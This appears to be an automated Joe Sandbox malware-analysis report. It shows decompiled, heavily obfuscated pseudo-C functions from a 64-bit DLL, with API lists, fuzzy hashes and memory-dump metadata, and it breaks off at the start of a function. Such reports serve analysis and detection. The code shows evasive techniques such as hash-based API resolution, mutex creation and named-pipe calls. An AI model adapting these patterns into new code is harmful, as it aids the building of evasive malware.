                                				r11d = _t254 - 0x1563;
                                				 *((intOrPtr*)(_t238 + 0x40)) = r11d;
                                				_t150 = _t260 - 0x544;
                                				 *(_t238 + 0x38) = _t150;
                                				_t157 = _t258 - 0xb3d;
                                				_t154 = _t153 + 0x1c8;
                                				r9d = _t258 + 0x612;
                                				 *(_t238 + 0x30) = _t154;
                                				 *(_t238 + 0x28) = __r9;
                                				r8d = r8d + 0x216;
                                				 *(_t238 + 0x20) = _t157;
                                				E00007FFC7FFC130E82D0( *((intOrPtr*)(__r9 + 0x328)), _t230, _t230); // executed
                                				goto 0x130f803b;
                                				goto 0x130f803b;
                                				_t228 = r15d;
                                				_t251 = _t154;
                                				if (_t251 - (( *(_t248 + 0xd8) | _t228) ^ _t157) >= 0) goto 0x130f7ffe;
                                				if (_t251 -  *((intOrPtr*)(_t248 + 0x110)) +  *_t248 >= 0) goto 0x130f7fe6;
                                				SetEndOfFile(_t229);
                                				r9d =  *(__r9 + 0xc8);
                                				r10d =  *(__r9 + 0xf0);
                                				r9d = r9d & _t157;
                                				r10d = r10d ^  *(__r9 + 0x90);
                                				r9d = r9d ^ 0x00003666;
                                				 *(_t238 + 0x38) = r9d;
                                				r13d = r13d | _t154;
                                				 *(_t238 + 0x30) = _t150 & 0x000027b2;
                                				r10d = r10d - 0x3a59;
                                				 *(_t238 + 0x28) = _t154 & 0x00000008 | 0x000023f6;
                                				 *(_t238 + 0x20) = r10d;
                                				r8d = r13d;
                                				r14d = E00007FFC7FFC130E8BF0((_t154 & 0x000027b2) +  *(__r9 + 0x120),  *((intOrPtr*)(__r9 + 0x130)) + r14d,  *((intOrPtr*)(_t248 + 0x110)) +  *_t248, __r9, ( *(_t248 + 0xd8) | _t228) ^ _t157, _t228, _t230, __r9, _t252);
                                				goto 0x130f803b;
                                				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
                                				goto 0x130f803b;
                                				_t250 =  *((intOrPtr*)(__r9 + 0x1f0));
                                				if (_t251 == r8d * _t250 - _t228) goto 0x130f803b;
                                				r8d = r8d * (_t230 + _t230);
                                				if (_t154 + 1 != r8d * _t250 - _t228) goto 0x130f8020;
                                				return _t258 - 0xfd2;
                                			}




























                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 1146652191-0
                                • Opcode ID: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction ID: 9953ac6f7de0af428f2d765eb6b5b05fb97ad360630c624243fc19e29c606389
                                • Opcode Fuzzy Hash: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction Fuzzy Hash: 65B18672605B998BDB90CF25D894BE937A8F788B98F054036CE4D5B358DF38D661CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 58%
                                			E00007FFC7FFC130FA4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
                                				long long _v96;
                                				short _v104;
                                				void* __rbx;
                                				long long _t55;
                                				intOrPtr _t60;
                                				signed long long _t62;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t55 = __rax;
                                				r8d = r8d + 4;
                                				_a104 = _a104 + 0xfffffdb4;
                                				r9d = __rcx - 0x30d5;
                                				_a96 = r8d;
                                				_a16 = r9d;
                                				_a120 = _a80 + 0xffffda68;
                                				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x130fa608;
                                				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x130fa5fa;
                                				_t60 = _a88;
                                				_v96 = 0x38e9;
                                				r9d = 0x3666;
                                				_v104 = 0x2598;
                                				r8d = 0x37e1;
                                				E00007FFC7FFC130E9AC0(_t60, __rcx, _t60, _t69); // executed
                                				 *((long long*)(_t60 + 0x348)) = _t55;
                                				_t62 = __rcx ^ 0x0000a532;
                                				 *(_t60 + 0x158) = _t62;
                                				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x130fa5bc;
                                				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
                                				if (0x2599 != _t62) goto 0x130fa590;
                                				_v96 = 0x3189;
                                				r9d = 0x3666;
                                				_v104 = 0x30d5;
                                				r8d = 0x37e1;
                                				E00007FFC7FFC130E9AC0(_t60, _t62, _t60, _t69);
                                				 *((long long*)(_t60 + 0x350)) = 0x2599;
                                				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
                                				return _t68 + 0x2103;
                                			}












                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 77cb60f2d01c3103deb4358d7e7c9f8949588141885a850d418d3db0e2500b78
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 77cb60f2d01c3103deb4358d7e7c9f8949588141885a850d418d3db0e2500b78
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 50%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				intOrPtr _t93;
                                				intOrPtr _t99;
                                				signed int _t105;
                                				void* _t110;
                                				signed long long _t136;
                                				intOrPtr _t149;
                                				long long _t150;
                                				void* _t154;
                                				void* _t155;
                                				void* _t158;
                                				signed long long _t159;
                                				void* _t160;
                                				void* _t163;
                                				void* _t165;
                                				void* _t166;
                                				void* _t168;
                                				long long _t170;
                                				void* _t171;
                                
                                				r13d =  *(_t160 + 0x100);
                                				r10d = __r8 - 0x30d5;
                                				r12d =  *(_t160 + 0x108);
                                				r8d = __rcx - 0x1408;
                                				r13d = r13d + 0xffffda68;
                                				 *(_t160 + 0x100) = r10d;
                                				_t170 = __rdx;
                                				 *(_t160 + 0x108) = r8d;
                                				_t110 = __rcx + 0x61f;
                                				r9d = r9d + 0xffffeb0d;
                                				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
                                				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
                                				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
                                				r12d = r12d + 0xffffdc0a;
                                				r15d = r13d;
                                				if (_t99 - _t168 + 0x3189 >= 0) goto 0x130e2d94;
                                				if (_t99 - __r8 - 0x106 >= 0) goto 0x130e2d94;
                                				if (_t110 == _t154 - 0x3f3) goto 0x130e2d94;
                                				 *((long long*)(_t160 + 0xc8)) = __rbx;
                                				if (r12d - _t168 + 0x1f2c > 0) goto 0x130e2c16;
                                				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
                                				r9d = __r10 + 0x2598;
                                				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
                                				r10d = _t158 - 0x984;
                                				r11d = _t154 - 0x1956;
                                				r8d = _t166 + 0x2103;
                                				_t108 =  *(_t160 + 0x100) + 0x38e9;
                                				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
                                				 *(__rdx + 0xa0) = _t136 | 0x00002598;
                                				_t105 = _t168 + 0x27b2;
                                				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
                                				 *(_t160 + 0x58) = r10d;
                                				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
                                				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
                                				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
                                				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
                                				 *(_t160 + 0x38) = _t105;
                                				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
                                				 *((long long*)(_t160 + 0x28)) = __rdx;
                                				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
                                				E00007FFC7FFC130FD5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171); // executed
                                				goto 0x130e2d8c;
                                				_t150 = r13d;
                                				_t159 = r12d;
                                				 *((long long*)(_t160 + 0x70)) = _t150;
                                				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
                                				GetProcessHeap();
                                				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
                                				r13d = r15d;
                                				r8d =  *(_t160 + 0x108);
                                				r9d =  *((intOrPtr*)(_t160 + 0xd0));
                                				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
                                				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x130e2d8c;
                                				_t93 =  *((intOrPtr*)(__rdx + 0x78));
                                				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x130e2d8c;
                                				asm("o16 nop [eax+eax]");
                                				 *(_t160 + 0x58) = 0x2743;
                                				 *((long long*)(_t160 + 0x50)) = 0x2de1;
                                				 *((long long*)(_t160 + 0x48)) = 0x19c7;
                                				r9d = 0x1ff4;
                                				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
                                				r8d = 0x1c0c;
                                				 *(_t160 + 0x38) = 0x26f1;
                                				 *(_t160 + 0x30) = 0x1000;
                                				 *((long long*)(_t160 + 0x28)) = 0x1acd;
                                				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
                                				 *0x13124160 = E00007FFC7FFC130FF8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
                                				r15d = r15d ^ r13d &  *(_t170 + 0x188);
                                				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
                                				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x130e2cf0;
                                				return _t171 + 0x1f2c;
                                			}

























                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201640CA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                                				intOrPtr _v56;
                                				void* _v64;
                                				intOrPtr _v72;
                                				long long _v88;
                                				void* __rsi;
                                				void* __rbp;
                                				long long* _t58;
                                				long long* _t59;
                                				long long _t60;
                                				long long _t75;
                                				intOrPtr* _t87;
                                
                                				_t60 = __rbx;
                                				_t58 = __rax;
                                				_a8 = __rbx;
                                				_t76 =  *0x640cd458;
                                				_t87 = __rcx;
                                				_v72 = 0x18;
                                				_v56 = 0;
                                				E00000201201640C908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x640cd458 + 0x20)));
                                				if (_t58 == __rbx) goto 0x640ca804;
                                				r9d = 0; // executed
                                				 *_t58(); // executed
                                				goto 0x640ca806;
                                				if (0 == 0) goto 0x640ca8d2;
                                				r9d = 0;
                                				_a16 =  *__rcx;
                                				_t59 =  &_a24;
                                				_v88 = _t59;
                                				E00000201201640C1000(__edi, _t59, __rbx,  &_a16,  *0x640cd458, 0x201640c0000,  *0x640cd448 + 0x201640d1178);
                                				if (_t59 == _t60) goto 0x640ca8d2;
                                				E00000201201640C908C(0x3ff22481, _t59,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t59 == _t60) goto 0x640ca875;
                                				CreateMutexW(??, ??, ??); // executed
                                				goto 0x640ca878;
                                				_t75 = _t60;
                                				if (_t75 == _t60) goto 0x640ca8c4;
                                				E00000201201640C908C(0xc06f8334, _t59,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t59 == _t60) goto 0x640ca894;
                                				 *_t59();
                                				goto 0x640ca899;
                                				if (0x7f != 0xb7) goto 0x640ca8ba;
                                				E00000201201640C908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                                				if (_t59 == _t60) goto 0x640ca8c4;
                                				FindCloseChangeNotification(??); // executed
                                				goto 0x640ca8c4;
                                				 *((long long*)(_t87 + 0x18)) = _t75;
                                				HeapFree(??, ??, ??);
                                				return 1;
                                			}















                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: d238e9a14ffb5ec44fcbca782597d3d153850d2da174be31d188614afd2eb962
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 1F31E4326043A5DBEB20DF51E8493DA63A4F788784F684421BF4D4378EDE39D4AACB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F9F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rdi;
                                				void* __rbp;
                                				void* __r12;
                                				signed short _t143;
                                				signed int _t145;
                                				signed int _t199;
                                				signed int _t205;
                                				intOrPtr _t206;
                                				signed int _t209;
                                				signed int _t211;
                                				signed short* _t239;
                                				void* _t241;
                                				signed long long _t242;
                                				void* _t246;
                                				signed long long _t248;
                                				void* _t250;
                                				CHAR* _t253;
                                				void* _t256;
                                				void* _t258;
                                				void* _t259;
                                				signed short* _t262;
                                				void* _t267;
                                				void* _t271;
                                				void* _t273;
                                				void* _t275;
                                				void* _t277;
                                
                                				_t267 = __r10;
                                				_t265 = __r9;
                                				_t246 = __rdx;
                                				_t241 = __rcx;
                                				 *((long long*)(_t258 + 0x18)) = __rbx;
                                				 *(_t258 + 0x20) = r9d;
                                				 *((intOrPtr*)(_t258 + 8)) = __ecx;
                                				_t259 = _t258 - 0x90;
                                				r12d =  *(_t259 + 0x100);
                                				r10d = __rdx + 0x354;
                                				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
                                				r15d = r9d;
                                				 *(_t259 + 0x74) = __rdx - 0x3595;
                                				r13d = __rax - 0x228c;
                                				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
                                				r11d = _t271 + 0x14c1;
                                				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
                                				r14d = _t277 - 0x12f1;
                                				 *(_t259 + 0x7c) = r11d;
                                				 *(_t259 + 0x108) = _t277 - 0x145b;
                                				 *(_t259 + 0x80) = r14d;
                                				r9d = __rax - 0x11a9;
                                				r8d = __rax - 0x923;
                                				 *(_t259 + 0xd8) = r9d;
                                				 *(_t259 + 0x70) = r8d;
                                				_t206 = __rax - 0x11a9;
                                				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
                                				 *(_t259 + 0x110) = __rax + 0x984;
                                				if (r14d - _t256 + 0x106 < 0) goto 0x130fa261;
                                				if (r15d == _t275 + 0x1663) goto 0x130fa261;
                                				_t239[0xac] = _t239[0x11e];
                                				r10d = r10d - 0x283;
                                				r8d = 0x343a;
                                				r9d = 0x329d;
                                				 *(_t259 + 0x88) = r10d;
                                				 *(_t259 + 0x50) = 0x13118090;
                                				 *(_t259 + 0x48) = 0x7d;
                                				 *(_t259 + 0x40) = 0x1a;
                                				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
                                				 *(_t259 + 0x30) = 0x1e0;
                                				 *(_t259 + 0x28) = 0x3666;
                                				 *(_t259 + 0x20) = _t239;
                                				_t143 = E00007FFC7FFC130FF290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
                                				r9d =  *(_t259 + 0xf8);
                                				r8d =  *(_t259 + 0x110);
                                				r11d = _t253 - 0x1956;
                                				r12d = _t250 + 0x1309;
                                				r10d = _t273 + 0x23f6;
                                				r14d = _t273 + 0x30d5;
                                				_t239[0x11e] = _t143;
                                				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
                                				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
                                				r15d = r15d + 0xfffffbb6;
                                				 *(_t259 + 0x58) = r10d;
                                				r9d = r9d + 0xfffffc44;
                                				 *(_t259 + 0x50) = r11d;
                                				r8d = r8d + 0xfffff9e1;
                                				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
                                				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
                                				 *(_t259 + 0x38) = _t206 + 0x1669;
                                				 *(_t259 + 0x30) = r14d;
                                				 *(_t259 + 0x28) = _t239;
                                				 *(_t259 + 0x20) = r15d;
                                				_t145 = E00007FFC7FFC130E90B0(0x13118090, _t239, _t241, _t246, __r8, __r11);
                                				r14d =  *(_t259 + 0x80);
                                				r8d =  *(_t259 + 0x74);
                                				r11d =  *(_t259 + 0x108);
                                				r8d = r8d + 0x27b2;
                                				r9d =  *(_t259 + 0x70);
                                				r11d =  &(r11d[0x9ed]);
                                				r10d = _t275 + 0x119f;
                                				 *(_t259 + 0xf8) = _t145;
                                				r9d = r9d + 0xfffff951;
                                				 *(_t259 + 0x48) = _t273 + 0x38e9;
                                				 *(_t259 + 0x40) = r8d;
                                				_t262 = _t239;
                                				 *(_t259 + 0x38) = r12d;
                                				 *(_t259 + 0x30) = r10d;
                                				 *(_t259 + 0x28) = r11d;
                                				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
                                				E00007FFC7FFC130E2390(0x13118090, _t239, _t241, _t246, _t262, _t265, _t271); // executed
                                				r8d =  *(_t259 + 0x70);
                                				r9d =  *(_t259 + 0xd8);
                                				r12d =  *(_t259 + 0x100);
                                				r15d =  *(_t259 + 0xe8);
                                				r11d =  *(_t259 + 0x7c);
                                				r10d =  *(_t259 + 0x88);
                                				if (r12d - _t273 + 0x27b2 >= 0) goto 0x130fa3c0;
                                				if (r13d - _t271 + 0x216 >= 0) goto 0x130fa31a;
                                				r11d = _t250 + 0x526;
                                				r10d = _t262 - 0x526;
                                				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
                                				_t205 =  &(_t262[0x644]);
                                				 *(_t259 + 0x58) = r10d;
                                				r15d = _t241 + 0x11ae;
                                				 *(_t259 + 0x50) = r11d;
                                				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
                                				 *(_t259 + 0x48) = _t239;
                                				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
                                				 *(_t259 + 0x40) = _t199;
                                				r14d = r14d + 0xcdf;
                                				 *(_t259 + 0x38) = _t205;
                                				r9d = r9d + 0x4ca;
                                				 *(_t259 + 0x30) = _t209;
                                				r8d = r8d + 0xfffffde6;
                                				 *(_t259 + 0x28) = r14d;
                                				 *(_t259 + 0x20) = r15d;
                                				E00007FFC7FFC130F75E0(0x13118090, _t241, _t246);
                                				goto 0x130fa47d;
                                				_t242 = _t239[0x80];
                                				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x130fa340;
                                				_t211 = _t209 & _t239[0xf0] & 0x00003189;
                                				r12d = r12d + _t211;
                                				_t248 = _t239[0x114] & r9d;
                                				if (r13d - _t248 < 0) goto 0x130fa47d;
                                				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x130fa39c;
                                				r12d = r12d - (r15d | 0x000027b2);
                                				 *_t239 =  *_t239 - _t242;
                                				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
                                				goto 0x130fa3af;
                                				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
                                				r13d = r13d + 2;
                                				if (r13d - _t248 >= 0) goto 0x130fa366;
                                				goto 0x130fa47d;
                                				if (_t239[0x10c] - _t242 >= 0) goto 0x130fa47d;
                                				r12d =  *(_t259 + 0x70);
                                				asm("o16 nop [eax+eax]");
                                				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
                                				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
                                				r9d = r9d * (r11w & 0xffffffff);
                                				r8d = _t239[0xc4] * r12d * 0x30d5;
                                				CallNamedPipeA(_t253, _t256, ??, ??, ??);
                                				r11d =  *(_t259 + 0x7c);
                                				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x130fa3f0;
                                				r12d =  *(_t259 + 0x100);
                                				return _t271 + 0xb3d;
                                			}






























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E00007FFC7FFC130E4820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r13;
                                				void* __r15;
                                				signed int _t132;
                                				signed int _t134;
                                				signed int _t168;
                                				signed int _t183;
                                				signed int _t188;
                                				signed int _t190;
                                				signed int _t200;
                                				signed long long _t217;
                                				signed int _t219;
                                				signed long long _t223;
                                				signed long long _t226;
                                				void* _t235;
                                				void* _t237;
                                				void* _t239;
                                				void* _t241;
                                				void* _t242;
                                				void* _t244;
                                				void* _t247;
                                				void* _t248;
                                				long long _t249;
                                				void* _t251;
                                				void* _t253;
                                				signed int _t254;
                                				void* _t256;
                                				CHAR* _t258;
                                				signed long long _t259;
                                
                                				_t247 = __r10;
                                				_t246 = __r9;
                                				_t244 = __r8;
                                				_t221 = __rcx;
                                				_t218 = __rbx;
